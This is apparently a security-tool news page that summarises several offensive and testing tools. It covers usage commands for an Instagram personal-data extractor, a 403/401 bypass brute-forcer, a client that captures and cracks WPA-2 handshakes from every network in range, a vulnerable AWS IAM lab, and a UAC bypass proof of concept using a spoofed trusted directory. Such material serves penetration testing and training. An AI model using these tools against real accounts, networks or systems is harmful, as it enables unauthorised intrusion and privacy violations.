Today β€” 7 December 2021 β€” Tools

Swurg - Parse OpenAPI Documents Into Burp Suite For Automating OpenAPI-based APIs Security Assessments

7 December 2021 at 11:30
By: Zion3R


Swurg is a Burp Suite extension designed for OpenAPI testing.

The OpenAPI Specification (OAS) defines a standard, programming language-agnostic interface description for REST APIs, which allows both humans and computers to discover and understand the capabilities of a service without requiring access to source code, additional documentation, or inspection of network traffic. When properly defined via OpenAPI, a consumer can understand and interact with the remote service with a minimal amount of implementation logic. Similar to what interface descriptions have done for lower-level programming, the OpenAPI Specification removes guesswork in calling a service.

Use cases for machine-readable API definition documents include, but are not limited to: interactive documentation; code generation for documentation, clients, and servers; and automation of test cases. OpenAPI documents describe an API's services and are represented in either YAML or JSON formats. These documents may either be produced and served statically or be generated dynamically from an application.

- OpenAPI Initiative
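As a concrete illustration, here is a minimal OpenAPI 3.0 document (a hypothetical single-endpoint API, not tied to any real service) built and serialized as JSON, the kind of machine-readable definition Swurg parses:

```python
import json

# A minimal, illustrative OpenAPI 3.0 document (hypothetical API).
spec = {
    "openapi": "3.0.0",
    "info": {"title": "Example API", "version": "1.0.0"},
    "paths": {
        "/users/{id}": {
            "get": {
                "parameters": [
                    {"name": "id", "in": "path", "required": True,
                     "schema": {"type": "integer"}}
                ],
                "responses": {"200": {"description": "A single user"}},
            }
        }
    },
}

# OpenAPI documents may be served as JSON or YAML; JSON shown here.
document = json.dumps(spec, indent=2)
print(document)
```

From a definition like this, a parser can enumerate every operation, its parameters and their types without ever observing live traffic.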

Performing security assessments of OpenAPI-based APIs can be tedious because Burp Suite (the industry standard) lacks native OpenAPI parsing capabilities. The usual workarounds are third-party tools (e.g. SoapUI) or custom scripts (often written on a per-engagement basis) that parse OpenAPI documents and feed the results into Burp Suite to leverage its first-class scanning capabilities.

Swurg is an OpenAPI parser that aims to streamline this entire process by allowing security professionals to use Burp Suite as a standalone tool for security assessment of OpenAPI-based APIs.


Supported Features

  • OpenAPI documents can be parsed either from a supplied file or URL. The extension can fetch OpenAPI documents directly from a URL using the Send to Swagger Parser feature under the Target -> Site map context menu.
  • Parse OpenAPI documents, formerly known as the Swagger specification, fully compliant with OpenAPI 2.0/3.0 Specifications (OAS).
  • Requests can be directly viewed/edited within the extension prior to sending them to other Burp tools.
  • Requests can be sent to the Comparer, Intruder, Repeater, Scanner, Site map and Scope Burp tools.
  • Requests matching specific criterias (detailed in the 'Parameters' tab) can be intercepted to automatically match and replace the parsed parameters default values defined in the 'Parameters' tab. This feature allows for fine-tuning of the requests prior to sending them to other Burp tools (e.g., scanner). Edited requests can be viewed within the 'Modified Request (OpenAPI Parser)' tab of Burp's message editor.
  • Row highlighting allowing pentesters to highlight "interesting" API calls and/or colour code them for reporting purposes.
  • Supports both JSON and YAML formats.

Installation

Compilation

Windows & Linux

  1. Install Gradle (https://gradle.org/)
  2. Download the repository:
$ git clone https://github.com/AresS31/swurg
$ cd swurg
  3. Create the swurg jarfile:
$ gradle fatJar

Burp Suite settings

In Burp Suite, under the Extender/Options tab, click on the Add button and load the swurg-all jarfile.

Possible Improvements

  • Beautify the graphical user interface.
  • Deep parsing of OpenAPI schemas to collect all nested parameters along with their example/type.
  • Code simplification/refactoring.
  • Enable cells editing to change API calls directly from the GUI.
  • Further optimise the source code.
  • Implement support for authenticated testing (via user-supplied API-keys).
  • Improve the Param column by adding the type of parameters (e.g. inquery, inbody, etc.).
  • Implement the tables and context menus.
  • Increase the extension verbosity (via the bottom panel).

Dependencies

Third-party libraries

Swagger Parser:

The Swagger Parser library is required and automatically imported in this project.

Project information

In July 2016, after posting a request for improvement on the PortSwigger support forum, I decided to take the initiative and to implement a solution myself.

The extension is still in development; feedback, comments and contributions are therefore much appreciated.

One-time donation

  • Donate via Bitcoin : 15aFaQaW9cxa4tRocax349JJ7RKyj7YV1p
  • Donate via Bitcoin Cash : qqez5ed5wjpwq9znyuhd2hdg86nquqpjcgkm3t8mg3
  • Donate via Ether : 0x70bC178EC44500C17B554E62BC31EA2B6251f64B

License

Copyright (C) 2016 - 2021 Alexandre Teyar

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.



Yesterday β€” 6 December 2021 β€” Tools

STEWS - A Security Tool For Enumerating WebSockets

6 December 2021 at 20:30
By: Zion3R


STEWS is a tool suite for security testing of WebSockets

This research was first presented at OWASP Global AppSec US 2021


Features

STEWS provides the ability to:

  • Discover: find WebSockets endpoints on the web by testing a list of domains
  • Fingerprint: determine what WebSockets server is running on the endpoint
  • Vulnerability Detection: test whether the WebSockets server is vulnerable to a known WebSockets vulnerability

The included whitepaper in this repository provides further details of the research undertaken. The included slide deck was presented at OWASP AppSec US 2021.

Complementary repositories created as part of this research include:

Installation & Usage

Each portion of STEWS (discovery, fingerprinting, vulnerability detection) has separate instructions. Please see the README in each respective folder.

WebSocket Discovery

See the discovery README

WebSocket Fingerprinting

See the fingerprinting README

WebSocket Vulnerability Detection

See the vulnerability detection README

Why this tool?

WebSocket servers have been largely ignored in security circles. This is partially due to three hurdles that have not been clearly addressed for WebSocket endpoints:

  1. Discovery
  2. Enumeration/fingerprinting
  3. Vulnerability detection

STEWS attempts to address these three points. A custom tool was required because there is a distinct lack of support for manually configured WebSocket testing in current security testing tools:

  1. There is a general lack of supported and scriptable WebSocket security testing tools (for example, NCC's unsupported wssip tool, nuclei's lack of WebSocket support, and nmap's lack of WebSocket support).
  2. Burp Suite lacks support for WebSocket extensions (for example, see this PortSwigger forum thread and this one).
  3. There is a lack of deeper WebSocket-specific security research (the Awesome WebSocket Security repository lists published WebSockets security research).
  4. WebSockets have proliferated across the modern web (as seen in the results of the STEWS discovery tool), which makes these gaps more pressing.
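At the wire level, discovering a WebSocket endpoint reduces to the RFC 6455 HTTP Upgrade handshake: send an `Upgrade: websocket` request and check that the server answers `101` with the correct `Sec-WebSocket-Accept` value. A minimal sketch of that mechanism (illustrative only, not STEWS's actual code):

```python
import base64
import hashlib

# Fixed GUID defined by RFC 6455 for computing Sec-WebSocket-Accept.
WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"

def expected_accept(client_key: str) -> str:
    """Value a conformant WebSocket server must echo in Sec-WebSocket-Accept."""
    digest = hashlib.sha1((client_key + WS_GUID).encode()).digest()
    return base64.b64encode(digest).decode()

def handshake_request(host: str, path: str, client_key: str) -> bytes:
    """HTTP/1.1 Upgrade request that probes for a WebSocket endpoint."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Upgrade: websocket\r\n"
        "Connection: Upgrade\r\n"
        f"Sec-WebSocket-Key: {client_key}\r\n"
        "Sec-WebSocket-Version: 13\r\n\r\n"
    ).encode()

# RFC 6455's own sample key/accept pair:
print(expected_accept("dGhlIHNhbXBsZSBub25jZQ=="))  # s3pPLMBiTxaQ9kYGzzhZRbK+xOo=
```

A discovery scan is then a matter of sending this request to each candidate host and checking the response status and accept header; fingerprinting builds on the server's deviations from the spec.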


Toutatis - A Tool That Allows You To Extract Information From Instagram Accounts Such As E-Mails, Phone Numbers And More

6 December 2021 at 11:30
By: Zion3R

Toutatis is a tool that allows you to extract information from Instagram accounts, such as e-mails, phone numbers and more.


Prerequisite

Python 3

️
Installation

With PyPI

pip install toutatis

With Github

git clone https://github.com/megadose/toutatis.git
cd toutatis/
python3 setup.py install

Usage:

toutatis -u username -s instagramsessionid

Example

Informations about     : xxxusernamexxx
Full Name : xxxusernamesxx | userID : 123456789
Verified : False | Is buisness Account : False
Is private Account : False
Follower : xxx | Following : xxx
Number of posts : x
Number of tag in posts : x
External url : http://example.com
IGTV posts : x
Biography : example biography
Public Email : [email protected]
Public Phone : +00 0 00 00 00 00
Obfuscated email : me********[email protected]
Obfuscated phone : +00 0xx xxx xx 00
------------------------
Profile Picture : https://scontent-X-X.cdninstagram.com/

To retrieve the sessionID

Thank you to :



Before yesterday β€” Tools

Forbidden - Bypass 4xx HTTP Response Status Codes

5 December 2021 at 20:30
By: Zion3R


Bypass 4xx HTTP response status codes. Based on PycURL.

The script uses multithreading and relies on brute force, so it may produce some false positives. Output is colour-coded.

Results are sorted by HTTP response status code (ascending), content length (descending), and ID (ascending).

To filter out false positives, check each content length manually with the provided cURL command. If it does not result in a bypass, ignore all other results with the same content length.
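The triage described above can be mechanized: once one result of a given content length is confirmed as a false positive, every result with the same length can be discarded. A sketch (the `results` list is hypothetical, shaped like the tool's sorted output):

```python
from collections import defaultdict

# Hypothetical results shaped like forbidden.py's sorted output.
results = [
    {"id": 1, "code": 200, "length": 1234},
    {"id": 2, "code": 200, "length": 1234},
    {"id": 3, "code": 200, "length": 87},
]

# Group result IDs by content length: one confirmed false positive
# rules out everything else with the same length.
by_length = defaultdict(list)
for r in results:
    by_length[r["length"]].append(r["id"])

false_positive_length = 1234  # confirmed manually with the provided cURL command
survivors = [r for r in results if r["length"] != false_positive_length]
print([r["id"] for r in survivors])  # [3]
```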


Test Scope
Test | Type
Various HTTP methods | method
Various HTTP methods with 'Content-Length: 0' header | method
Cross-site tracing (XST) with HTTP TRACE and TRACK methods | method
File upload with HTTP PUT method | method
Various HTTP method overrides | method-override
Various HTTP headers | header
Various URL overrides | header
URL override with two 'Host' headers | header
Various URL path bypasses | path
Basic authentication/authorization including null session | auth
Broken URL parser check | parser

Extend this script to your liking.

Tested on Kali Linux v2021.4 (64-bit).

Made for educational purposes. I hope it will help!

Future plans:

  • add option to test only allowed HTTP methods,
  • do not ignore URL parameters and fragments.


How to Run

Open your preferred console from /src/ and run the commands shown below.

Install required tools:

apt-get install -y curl  

Install required packages:

pip3 install -r requirements.txt  

Run the script:

python3 forbidden.py  

Be aware of rate limiting. Give it some time before you run the script again for the same domain in order to get better results.

Some websites require a user agent header. Download a user agent list from here.

Automation

Bypass 403 Forbidden HTTP response status code:

count=0; for subdomain in $(cat subdomains_403.txt); do count=$((count+1)); echo "#${count} | ${subdomain}"; python3 forbidden.py -u "${subdomain}" -t method,method-override,header,path -f GET -o "forbidden_403_results_${count}.json"; done

Bypass 401 Unauthorized HTTP response status code:

count=0; for subdomain in $(cat subdomains_401.txt); do count=$((count+1)); echo "#${count} | ${subdomain}"; python3 forbidden.py -u "${subdomain}" -t auth -f GET -o "forbidden_401_results_${count}.json"; done

Broken URL parser check: use the same loop with '-t parser'.

HTTP Methods

ACL  ARBITRARY  BASELINE-CONTROL  BIND  CHECKIN  CHECKOUT  CONNECT  COPY  DELETE  GET  HEAD  INDEX  LABEL  LINK  LOCK  MERGE  MKACTIVITY  MKCALENDAR  MKCOL  MKREDIRECTREF  MKWORKSPACE  MOVE  OPTIONS  ORDERPATCH  PATCH  POST  PRI  PROPFIND  PROPPATCH  PUT  REBIND  REPORT  SEARCH  SHOWMETHOD  SPACEJUMP  TEXTSEARCH  TRACE  TRACK  UNBIND  UNCHECKOUT  UNLINK  UNLOCK  UPDATE  UPDATEREDIRECTREF  VERSION-CONTROL  

HTTP Headers

Client-IP  Cluster-Client-IP  Connection  Contact  Forwarded  Forwarded-For  Forwarded-For-Ip  From  Host  Origin  Referer  Stuff  True-Client-IP  X-Client-IP  X-Custom-IP-Authorization  X-Forward  X-Forwarded  X-Forwarded-By  X-Forwarded-For  X-Forwarded-For-Original  X-Forwarded-Host  X-Forwarded-Server  X-Forward-For  X-Forwared-Host  X-Host  X-HTTP-Host-Override  X-Original-URL  X-Originating-IP  X-Override-URL  X-ProxyUser-IP  X-Real-IP  X-Remote-Addr  X-Remote-IP  X-Rewrite-URL  X-Wap-Profile  X-Server-IP  X-Target  

URL Paths

Inject to front, back, and both front and back of the URL path; with and without prepending and appending slashes.

Results Format
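The URL path bypasses of the 'path' test type inject payloads around the path, to the front, the back, and both, with and without slashes. An illustrative generator (the payloads are common examples, not forbidden.py's actual internal list):

```python
# Illustrative generator of URL path bypass candidates; the payload set is a
# sample of common tricks, not forbidden.py's actual internal list.
def path_bypass_candidates(path, payloads=("%2e", "..;", ".", ";")):
    variants = set()
    trimmed = path.strip("/")
    for p in payloads:
        variants.update((
            f"/{p}/{trimmed}",      # front, slash-separated
            f"/{trimmed}/{p}",      # back, slash-separated
            f"/{p}/{trimmed}/{p}",  # both front and back
            f"/{p}{trimmed}",       # front, no separating slash
            f"/{trimmed}{p}",       # back, no separating slash
        ))
    return sorted(variants)

for v in path_bypass_candidates("/admin")[:5]:
    print(v)
```

Each candidate is then requested and the response compared against the baseline 4xx, exactly the brute-force approach that makes the content-length triage above necessary.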

Images

Figure 1 - Help



AirStrike - Automatically Grab And Crack WPA-2 Handshakes With Distributed Client-Server Architecture

5 December 2021 at 11:30
By: Zion3R

Tool that automates cracking of WPA-2 Wi-Fi credentials using client-server architecture


Requirements

Airstrike uses the Hashcat Brain architecture, the aircrack-ng suite, the entr utility and some helper scripts.

You can use the install.sh script to download all dependencies if you are on a system with access to apt or pacman. On Gentoo or Void Linux you will have to install hcxtools by hand, as they are not available in those repos (or maybe I've missed something). Some other uncommon distros are not covered either; for example, Alpine has no hashcat package. If your distro is exotic, you can use Nix, since all needed packages are in nixpkgs.

If you're using Nix/NixOS, you can jump into Nix-Shell with needed dependencies with: nix-shell -p hashcat hashcat-utils aircrack-ng entr hcxtools

Usage

Run aircrack_server.sh on the machine on which you want to crack passwords. This script builds the aircrack_client.sh file, which can be executed on any Linux host able to connect to the server started earlier. Upon execution, the client automatically captures handshakes, connects to the server and sends the captured data.

Whenever the server successfully cracks a password, the watcher.sh script prints it to the terminal on the server side.

The only required flag for airstrike_client.sh is -w: it specifies the wordlist the server should use. The listening interface can be specified with the -i flag; by default, the current wireless interface is selected automatically. Additionally, airstrike_client.sh listens for WPA-2 data without any filter, so it will capture and crack the passwords of all Wi-Fi networks in range (whenever handshakes are exchanged).

Navigation

Ctrl + S sends captured assets (Wi-Fi handshakes in .hccapx form) to the server. Ctrl + I displays information about capture progress.

The above shortcuts can be used inside a running instance of airstrike_client.sh.

made with love by Red Code Labs <*>



IAM Vulnerable - Use Terraform To Create Your Own Vulnerable By Design AWS IAM Privilege Escalation Playground

4 December 2021 at 20:30
By: Zion3R


Use Terraform to create your own vulnerable by design AWS IAM privilege escalation playground.


IAM Vulnerable uses the Terraform binary and your AWS credentials to deploy over 250 IAM resources into your selected AWS account. Within minutes, you can start learning how to identify and exploit vulnerable IAM configurations that allow for privilege escalation.


Recommended Approach

  1. Select or create an AWS account - Do NOT use an account that has any production resources or sensitive data.
  2. Create your vulnerable playground - Use this repo to create the IAM principals and policies that support 31 unique AWS IAM privesc paths.
  3. Do your homework - Learn about the 21 original privesc paths pioneered by Spencer Gietzen.
  4. Hacky, hack - Practice exploitation in your new playground using Gerben Kleijn's guide.
  5. Level up - Run your tools against your new IAM privesc playground account (i.e., Cloudsplaining, AWSPX, Principal Mapper, Pacu).
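As a taste of what these paths look like, the well-known IAM-CreateNewPolicyVersion path (privesc1 in this playground, one of the paths pioneered by Spencer Gietzen) lets a principal with `iam:CreatePolicyVersion` set a new default policy version granting full admin. A hedged sketch; the ARN variable is hypothetical and the boto3 call is shown but not executed:

```python
import json

# The standard full-admin policy document shape used in this escalation.
def admin_policy_document() -> str:
    return json.dumps({
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
    })

# With boto3 (not executed here), the escalation is a single API call:
#   boto3.client("iam").create_policy_version(
#       PolicyArn=target_policy_arn,          # hypothetical ARN of an attached policy
#       PolicyDocument=admin_policy_document(),
#       SetAsDefault=True,
#   )
print(admin_policy_document())
```

The other 30 paths follow the same pattern: one or two over-broad IAM permissions that, chained with an AWS API call, yield administrative access.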

Detailed Usage Instructions

Blog Post: IAM Vulnerable - An AWS IAM Privilege Escalation Playground

Quick Start

This quick start outlines an opinionated approach to getting IAM Vulnerable up and running in your AWS account as quickly as possible. You might have many of these steps already completed, or you might want to tweak things to work with your current configuration. Check out the Other Use Cases section in this repository for some additional configuration options.

  1. Select or create an AWS account. (Do NOT use an account that has any production resources or sensitive data!)
  2. Create a non-root user with administrative access that you will use when running Terraform.
  3. Create an access key for that user.
  4. Install the AWS CLI.
  5. Configure your AWS CLI with your newly created admin user as the default profile.
  6. Confirm your CLI is working as expected by executing aws sts get-caller-identity.
  7. Install the Terraform binary and add the binary location to your path.
  8. git clone https://github.com/BishopFox/iam-vulnerable
  9. cd iam-vulnerable/
  10. terraform init
  11. (Optional) export TF_VAR_aws_local_profile=PROFILE_IN_AWS_CREDENTIALS_FILE_IF_OTHER_THAN_DEFAULT
  12. (Optional) export TF_VAR_aws_local_creds_file=FILE_LOCATION_IF_NON_DEFAULT
  13. (Optional) terraform plan
  14. terraform apply
  15. (Optional) Add the IAM Vulnerable profiles to your AWS credentials file, and change the account number.
    β€’ The following commands make a backup of your current AWS credentials file, take the example credentials file from the repo, replace the placeholder account with your target account number, and finally append all of the IAM Vulnerable privesc profiles to your credentials file so you can use them:
    β€’ cp ~/.aws/credentials ~/.aws/credentials.backup
    β€’ tail -n +7 aws_credentials_file_example | sed s/111111111111/$(aws sts get-caller-identity | grep Account | awk -F\" '{print $4}')/g >> ~/.aws/credentials

Cleanup

Whenever you want to remove all of the IAM Vulnerable-created resources, you can run these commands:

  1. cd iam-vulnerable/
  2. terraform destroy

What resources were just created?

The Terraform binary just used your default AWS account profile credentials to create:

  • 31 users, roles, and policies each with a unique exploit path to administrative access of the playground account
  • Some additional users, groups, roles, and policies that are required to fully realize certain exploit paths
  • Some additional users, roles, and policies that test the detection capabilities of other tools

By default, every role created by this Terraform module is assumable by the user or role you used to run Terraform.

  • If you'd like Terraform to use a profile other than the default profile, or you'd like to hard-code the assume_role_policy ARN, see Other Use Cases.

How much is this going to cost?

Deploying IAM Vulnerable in its default configuration will cost nothing. See the next section to learn how to enable non-default modules that do incur cost, and how much each module will cost per month if you deploy it.

A Modular Approach

IAM Vulnerable groups certain resources together in modules. Some of the modules are enabled by default (the ones that don't have any cost implications), and others are disabled by default (the ones that incur cost if deployed). This way, you can enable specific modules as needed.

For example, when you are ready to play with the exploit paths like ssm:StartSession that involve resources outside of IAM, you can deploy and tear down these resources on demand by uncommenting the module in the iam-vulnerable/main.tf file, and re-running terraform apply:

# Uncomment the next four lines to create an ec2 instance and related resources
#module "ec2" {
# source = "./modules/non-free-resources/ec2"
# aws_assume_role_arn = (var.aws_assume_role_arn != "" ? var.aws_assume_role_arn : data.aws_caller_identity.current.arn)
#}

After you uncomment the ec2 module, run:

terraform init
terraform apply

You have now deployed the required components to try the SSM privesc paths.

Free Resource Modules

There is no cost to anything deployed within free-resources:

Name | Default Status | Estimated Cost | Description
privesc-paths | Enabled | None | Contains all of the IAM privesc paths
tool-testing | Enabled | None | Contains test cases that evaluate the capabilities of the different IAM privesc tools

Non-free Resource Modules

Deploying these additional modules can result in cost:

Name | Default Status | Estimated Cost | Description | Required for
EC2 | Disabled | $4.50/month | Creates an EC2 instance and a security group that allows SSH from anywhere | ssm-SendCommand, ssm-StartSession, ec2InstanceConnect-SendSSHPublicKey
Lambda | Disabled | Monthly cost depends on usage (cost should be zero) | Creates a Lambda function | Lambda-EditExistingLambdaFunctionWithRole
Glue | Disabled | $4/hour | Creates a Glue dev endpoint | Glue-UpdateExistingGlueDevEndpoint
SageMaker | Disabled | Not sure yet | Creates a SageMaker notebook | sageMakerCreatePresignedNotebookURL
CloudFormation | Disabled | $0.40/month for the secret created via CloudFormation; nothing or barely nothing for the stack itself | Creates a CloudFormation stack that creates a secret in Secrets Manager | privesc-cloudFormationUpdateStack

Supported Privilege Escalation Paths

Path Name | IAM Vulnerable Profile Name | Non-Default Modules Required | Exploitation References

Category: IAM Permissions on Other Users
IAM-CreateAccessKey | privesc4 | None | Well, That Escalated Quickly - Privesc 04; s3cur3.it IAMVulnerable - Part 3
IAM-CreateLoginProfile | privesc5 | None | Well, That Escalated Quickly - Privesc 05; s3cur3.it IAMVulnerable - Part 3
IAM-UpdateLoginProfile | privesc6 | None | Well, That Escalated Quickly - Privesc 06; s3cur3.it IAMVulnerable - Part 3

Category: PassRole to Service
CloudFormation-PassExistingRoleToCloudFormation | privesc20 | None | Well, That Escalated Quickly - Privesc 20
CodeBuild-CreateProjectPassRole | privesc-codeBuildProject | None |
DataPipeline-PassExistingRoleToNewDataPipeline | privesc21 | None | Well, That Escalated Quickly - Privesc 21
EC2-CreateInstanceWithExistingProfile | privesc3 | None | Well, That Escalated Quickly - Privesc 03; s3cur3.it IAMVulnerable - Part 2
Glue-PassExistingRoleToNewGlueDevEndpoint | privesc18 | None | Well, That Escalated Quickly - Privesc 18
Lambda-PassExistingRoleToNewLambdaThenInvoke | privesc15 | None | Well, That Escalated Quickly - Privesc 15
Lambda-PassRoleToNewLambdaThenTrigger | privesc16 | None | Well, That Escalated Quickly - Privesc 16
SageMaker-CreateNotebookPassRole | privesc-sageNotebook | None | AWS IAM Privilege Escalation - Method 2
SageMaker-CreateTrainingJobPassRole | privesc-sageTraining | None |
SageMaker-CreateProcessingJobPassRole | privesc-sageProcessing | None |

Category: Permissions on Policies
IAM-AddUserToGroup | privesc13 | None | Well, That Escalated Quickly - Privesc 13
IAM-AttachGroupPolicy | privesc8 | None | Well, That Escalated Quickly - Privesc 08
IAM-AttachRolePolicy | privesc9 | None | Well, That Escalated Quickly - Privesc 09
IAM-AttachUserPolicy | privesc7 | None | Well, That Escalated Quickly - Privesc 07
IAM-CreateNewPolicyVersion | privesc1 | None | Well, That Escalated Quickly - Privesc 01; s3cur3.it IAMVulnerable - Part 1
IAM-PutGroupPolicy | privesc11 | None | Well, That Escalated Quickly - Privesc 11
IAM-PutRolePolicy | privesc12 | None | Well, That Escalated Quickly - Privesc 12
IAM-PutUserPolicy | privesc10 | None | Well, That Escalated Quickly - Privesc 10
IAM-SetExistingDefaultPolicyVersion | privesc2 | None | Well, That Escalated Quickly - Privesc 02; s3cur3.it IAMVulnerable - Part 2

Category: Privilege Escalation using AWS Services
EC2InstanceConnect-SendSSHPublicKey | privesc-instanceConnect | EC2 |
CloudFormation-UpdateStack | privesc-cfUpdateStack | CloudFormation |
Glue-UpdateExistingGlueDevEndpoint | privesc19 | Glue | Well, That Escalated Quickly - Privesc 19
Lambda-EditExistingLambdaFunctionWithRole | privesc17 | Lambda | Well, That Escalated Quickly - Privesc 17; s3cur3.it IAMVulnerable - Part 4
SageMakerCreatePresignedNotebookURL | privesc-sageUpdateURL | SageMaker | AWS IAM Privilege Escalation - Method 3
SSM-SendCommand | privesc-ssm-command | EC2 |
SSM-StartSession | privesc-ssm-session | EC2 |
STS-AssumeRole | privesc-assumerole | None |

Category: Updating an AssumeRole Policy
IAM-UpdatingAssumeRolePolicy | privesc14 | None | Well, That Escalated Quickly - Privesc 14

Other Use Cases

Default - No terraform.tfvars configured

  • Deploy using your default AWS profile (Default)
  • All created roles are assumable by the principal used to run Terraform (specified in your default profile)

Use a profile other than the default to run Terraform

  • Copy terraform.tfvars.example to terraform.tvvars
  • Uncomment the line #aws_local_profile = "profile_name" and enter the profile name you'd like to use
  • If you are using a non-default profile, and still want to use the aws_credentails_file_example file, you can use this command to generate an AWS credentials file that works with your non-default profile name (Thanks @scriptingislife)
    • Remember to replace nondefaultuser with the profile name you are using):
    • tail -n +7 aws_credentials_file_example | sed -e "s/111111111111/$(aws sts get-caller-identity | grep Account | awk -F\" '{print $4}')/g;s/default/nondefaultuser/g" >> ~/.aws/credentials

Use an ARN other than the caller as the principal that can assume the newly created roles

  • Copy terraform.tfvars.example to terraform.tvvars
  • Uncomment the line #aws_assume_role_arn = "arn:aws:iam::112233445566:user/you" and enter the ARN you'd like to use

Once created, each of the privesc roles will be assumable by the principal (ARN) you specified.

Create the resource in account X, but use an ARN from account Y as the principal that can assume the newly created roles

If you have configured AWS CLI profiles that assume roles into other accounts, you will want to specify the profile name AND manually specify the ARN you'd like to use to assume into the different roles.

In the example below, the resources will be created in the account that is tied to "prod-cross-org-access-role", but each role that Terraform creates can be accessed by "arn:aws:iam::112233445566:user/you", which belongs to another account.

aws_local_profile = "prod-cross-org-access-role"
aws_assume_role_arn = "arn:aws:iam::112233445566:user/you"

FAQ

How does IAM Vulnerable compare to CloudGoat, Terragoat, and SadCloud?

All of these tools use Terraform to deploy intentionally vulnerable infrastructure to AWS. However, IAM Vulnerable's focus is IAM privilege escalation, whereas the other tools either don't cover IAM privesc or only cover some scenarios.

  • CloudGoat deploys eight unique scenarios, some of which cover IAM privesc paths, while others focus on other areas like secrets in EC2 metadata.
  • Terragoat and SadCloud both focus on the many ways you can misconfigure your cloud accounts, but do not cover IAM privesc paths. In fact, you can almost think of IAM vulnerable as a missing puzzle piece when applied along side Terragoat or SadCloud. The intentionally vulnerable configurations complement each other.

How does IAM Vulnerable compare to Cloudsplaining, AWSPX, Principal Mapper, Pacu, CloudMapper, or ScoutSuite?

All of these tools help identify existing misconfigurations in your AWS environment. Some, like Pacu, also help you exploit misconfigurations. In contrast, IAM Vulnerable creates intentionally vulnerable infrastructure. If you really want to learn how to use tools like Principal Mapper (PMapper), AWSPX, Pacu, and Cloudsplaining, IAM Vulnerable is for you.

I've never used Terraform and I'm afraid of it. Help!?

I was also afraid of Terraform and projects that would create resources in my account before I knew how Terraform worked. Here are some things that might ease your anxiety:

  • By using an AWS account for this single purpose, you can rest assured that this repository won't negatively impact anything else you care about. Even if you deploy IAM Vulnerable to a separate account in an AWS organization, you can rest assured that the other accounts in the org will be outside the blast radius of this playground account.
  • The terraform plan command is a dry run. It shows you exactly what will be deployed if you run terraform apply before you actually run it.
  • Rest assured knowing that you can terraform destroy anything you terraform apply for a clean slate.
  • If your concern is cost, check out Infracost. You download this binary, register for a free API key, and execute it within a Terraform directory like iam-vulnerable. This tool runs terraform plan and calculates the monthly cost associated with the plan as it is currently configured. This is the tool I used to populate the module cost estimates table above.

Can I run this tool and another tool like CloudGoat, Terragoat, or SadCloud in the same AWS account?

Yes. Each tool will keep its Terraform state separately, but all resources will be created, updated, and deleted in the same account, and they can coexist.

Prior work and good references



DLLHijackingScanner - This Is A PoC For Bypassing UAC Using DLL Hijacking And Abusing The "Trusted Directories" Verification

4 December 2021 at 11:30
By: Zion3R


This is a PoC for bypassing UAC using DLL hijacking and abusing the "Trusted Directories" verification.


Generate Header from CSV

The python script CsvToHeader.py can be used to generate a header file. By default it will use the CSV file dll_hijacking_candidates.csv that can be found here: dll_hijacking_candidates.csv.

The script will check the following conditions for each portable executable (PE):

  • If the PE exists in the file system.
  • In the manifest of the PE, if the requestedExecutionLevel is set to one of the following values:
    • asInvoker
    • highestAvailable
    • requireAdministrator
  • In the manifest if the autoElevate is set to true:
    <autoElevate>true</autoElevate>
  • If the user specified the -c argument, the script will check if the DLL to hijack is in the list of DLLs imported form PE table.

Arguments

> python .\CsvToHeader.py -h
usage: CsvToHeader.py -f [DLL_PATH] -c

CsvToHeader can be used to generate a header file from a CSV.

optional arguments:
-h, --help show this help message and exit
-f [DLL_PATH] Path of the csv to convert (default="dll_hijacking_candidates.csv")
-c Enable import dll in PE (default=False)
-v, --version Show program's version number and exit

To generate the header file you can use the following command:

python CsvToHeader.py > dll_hijacking_candidates.h

Generate the list of vulnerable PE and DLL

The files that will be used are DLLHijacking.exe and test.dll.

DLLHijacking.exe

DLLHijacking.exe is the file that will be used to generate the list of vulnerable PE. It will perform the following steps:

  1. CreateFakeDirectory

    Function that creates a directory in C:\windows \system32 (note the trailing space after "windows", which is what defeats the trusted-directory check).

  2. Copy Files in the new directory

    • from C:\windows\system32\[TARGET.EXE] to C:\windows \system32\[TARGET.EXE]
    • from [CUSTOM_DLL_PATH] to C:\windows \system32\[TARGET.DLL]
  3. Trigger

    Run the executable from C:\windows \system32\[TARGET.EXE]

  4. CleanUpFakeDirectory

    Function that deletes the directory created in step 1 and the files copied in step 2.

  5. CheckExploit

    Check the content of the file C:\ProgramData\exploit.txt to see if the exploit was successful.

Log file

DLLHijacking.exe will always generate a log file exploitable.log with the following content:

  • 0 or 1 to indicates whether the exploit was able to bypass the UAC.
  • The executable name
  • The dll name

E.g.

1,computerdefaults.exe,PROPSYS.dll
0,computerdefaults.exe,Secur32.dll

Execution

Command to run:

DLLHijacking.exe [DLL_PATH]

If no argument is passed, the program uses the DLL test.dll, which is stored in the resource section of DLLHijacking.exe.

Result

Tested on Windows 10 Pro (10.0.19043 N/A Build 19043).

test.dll

test.dll is a simple dynamic library used to verify whether the exploit succeeded. The DLL will create a file C:\ProgramData\exploit.txt with the following content:

  • 0 or 1 to indicates whether the exploit was able to bypass the UAC.
  • The executable name
  • The DLL name

This file will be deleted once the exploit is complete.


Legal Disclaimer:

This project is made for educational and ethical testing purposes only. Usage of this software for attacking targets without prior mutual consent is illegal. 
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.


IDA2Obj - Static Binary Instrumentation

3 December 2021 at 20:30
By: Zion3R


IDA2Obj is a tool to implement SBI (Static Binary Instrumentation).

The working flow is simple:

  • Dump object files (COFF) directly from one executable binary.
  • Link the object files into a new binary, almost the same as the old one.
  • During the dumping process, you can insert any data/code at any location.
    • SBI is just one of the using scenarios, especially useful for black-box fuzzing.

How to use

  1. Prepare the environment:

    • Set AUTOIMPORT_COMPAT_IDA695 = YES in the idapython.cfg to support the API with old IDA 6.x style.
    • Install dependency: pip install cough
  2. Create a folder as the workspace.

  3. Copy the target binary which you want to fuzz into the workspace.

  4. Load the binary into IDA Pro, choose Load resources and manually load to load all the segments from the binary.

  5. Wait for the auto-analysis to finish.

  6. Dump object files by running the script MagicIDA/main.py.

